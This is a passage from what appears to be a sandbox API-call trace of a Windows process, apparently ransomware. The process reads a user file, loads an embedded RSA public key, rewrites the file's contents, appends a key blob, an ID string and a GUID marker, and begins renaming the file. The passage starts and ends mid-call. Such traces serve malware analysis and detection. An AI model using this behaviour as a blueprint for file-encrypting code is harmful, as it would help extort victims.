nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.567] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.567] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x4283, lpOverlapped=0x0) returned 1 [0195.568] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.568] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.568] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.568] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0195.570] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.570] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.570] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.570] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.570] GetLastError () returned 0x0 [0195.570] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.570] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0195.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.570] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.570] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.570] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4280) returned 0x2d49778 [0195.571] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42730 [0195.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0d8 [0195.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42778 [0195.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a138 [0195.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a168 [0195.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1c8 [0195.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a180 [0195.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.572] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1c8 [0195.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0195.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a180 [0195.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a168 [0195.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0195.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0195.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.575] GetCurrentThreadId () returned 0x264 [0195.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46c60 [0195.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0195.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0195.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.576] GetCurrentThreadId () returned 0x264 [0195.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1c8 [0195.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a168 [0195.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0195.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0195.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a180 [0195.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a150 [0195.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1e0 [0195.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0195.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1b0 [0195.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a198 [0195.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1f8 [0195.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a198 [0195.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0195.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0195.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0195.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a168 [0195.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0195.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0195.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0195.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0195.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0195.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0195.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0195.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0195.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0195.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0195.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0195.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0195.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0195.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0195.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0195.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0195.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0195.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0195.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0195.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42778 | out: hHeap=0x6a0000) returned 1 [0195.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0195.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0195.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0195.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0195.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0195.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0195.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0195.588] WriteFile (in: hFile=0x52c, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x427e, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x427e, lpOverlapped=0x0) returned 1 [0195.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0195.589] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x4283, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.589] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0195.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0195.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0195.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.590] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0195.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.591] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.591] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0195.591] CloseHandle (hObject=0x52c) returned 1 [0195.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0195.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d2cc80 [0195.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0195.593] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\jYMAb2bdVruj9SV.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\jymab2bdvruj9sv.m4a"), 